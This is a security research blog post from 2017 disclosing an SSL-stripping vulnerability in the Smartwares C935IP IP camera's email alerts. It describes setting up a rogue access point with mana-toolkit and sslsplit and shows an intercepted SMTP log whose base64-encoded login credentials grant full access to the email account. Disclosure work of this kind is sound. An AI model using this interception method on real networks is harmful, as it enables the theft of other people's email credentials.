Detecting the Smartwares C935IP SSL Vulnerability

Detecting the Smartwares C935IP SSL Vulnerability

Author: Mathis Hagen
Date: 2017-05-24 13:44:37

Content Table


1. Introduction

In this Article we are going to have a look at how we found the vulnerability of the Smartwares C935IP camera.The cameras email functionality was vulnerable to a MITM Attack using sslstrip as described in our short report. The Vulnerability leads to the possible corruption of the targeted email account. We will explain how we set up a host machine for an access point (AP) and how to set up the mana-toolkit, our tool of choice in this case. Our Goal is having an AP with an active Internet connection and sslsplit/sslstrip running.

2. Requirements

Obviously this works the best with linux so we are going to assume that we are using a linux system and the APT packet manager. We assume further that our host system has an active Internet connection via WIFI/LAN. It is probably helpfull to use an external WIFI card for hosting the AP, we, as well as sensepost, recommend the TL-WN722N USB card, mainly because it is cheap and features packet injection. The next step is the installation of the needed software. As mentioned earlier we are going to use the mana-toolkit. It is a toolkit created by sensepost and presented at Defcon 22 which is great at setting up rogue APs or, in our case, setting up an AP with sslsplit, sslstrib, firelamb and net-creds almost out of the box. If you are using Kali you can install it from the repositories via

sudo apt install mana-toolkit

Otherwise you have to do it from git. We are going to do this in Ubuntu 16.04.2. We are going to install it under /opt/mana by going to /opt and checking out the repository.

cd /opt git clone --depth 1 cd mana git submodule init git submodule update

Afterwards we should have all files needed. But before we run make we have to install some dependencies. We could use the ubuntu install script but it won't work. We can install the needed packages via apt with

sudo apt update sudo apt install libnl-genl-3-dev dnsmasq tinyproxy libssl-dev apache2 macchanger python-dnspython python-pcapy dsniff stunnel4 python-scapy libevent-dev make sudo make install

Now we can install the mana-toolkit with

make sudo make install

We could use the toolkit now but first we want to install sslsplit from github because it has an experimental feature we need. To do so we clone the sslsplit git directory and run make like this:

git clone cd sslsplit make sudo make install

After installing sslsplit we are going to have a look at the mana-toolkit start script we are going to use later. It is located at /opt/mana/run-mana/ There are a couple of other scripts but for now we will stick with This script starts a NATed AP with the full functionality of the mana-toolkit. We need to change a couple of things now.

Now we are good to go.

3. Testing

After configuring our setup it is time to use it. So the first thing to do is to start our AP using our modified script.


The next thing to do is to connect the smartphone -with the OMGuard HD app- and the camera to our AP and also connect them to each other. Then you have to enable the alert email tick box in the cameras settings and enter your account information in the advanced settings tab. If you decide to use e.g. a gmail account you can enable sSSL but it is not necessary or important since we can attack both, SSL and STARTLS. As soon as you trigger the alert now, via audio or motion, an email will be sent from the account specified by you. And sslsplit will intercept and log the communication with the mail server. The log location is at /var/lib/mana-toolkit. They should contain a passage similar to this:

220 ESMTP o22sm6089025wro.13 - gsmtp EHLO mail.txt at your service, [] 250-SIZE 35882577 250-8BITMIME 250-AUTH LOGIN PLAIN XOAUTH2 PLAIN-CLIENTTOKEN OAUTHBEARER XOAUTH 250-ENHANCEDSTATUSCODES 250-PIPELINING 250-CHUNKING 250 SMTPUTF8 AUTH LOGIN dXNlcm5hbWVAZ21haWwuY29tCg== ( base64 encoded) 334 UGFzc3dvcmQ6 cGFzc3dvcmQK (password base64 encoded) 235 2.7.0 Accepted MAIL FROM: 250 2.1.0 OK o22sm6089025wro.13 - gsmtp RCPT TO: 250 2.1.5 OK o22sm6089025wro.13 - gsmtp DATA 354 Go ahead o22sm6089025wro.13 - gsmtp From: To: username Subject: IPCAM Detector Alarm (2017-03-23 15:35:03) AAAA-000000-AAAAA (unique camera ID) MIME-version: 1.0 Content-type: text/html; charset=utf-8 2017-03-23 15:35:03 ......Motion detector alarm
. 250 2.0.0 OK 1490279709 o22sm6089025wro.13 - gsmtp QUIT 221 2.0.0 closing connection o22sm6089025wro.13 - gsmtp

Now we just need to decode the base64 encoded username and password and we have full access to the account.

4. Conclusion

Although or rather because this is a very simple test it is nice to have it available since it provides a fast and easy way to test devices for possible vulnerabilities in their SSL/TLS implementations.

Who we are & Disclaimer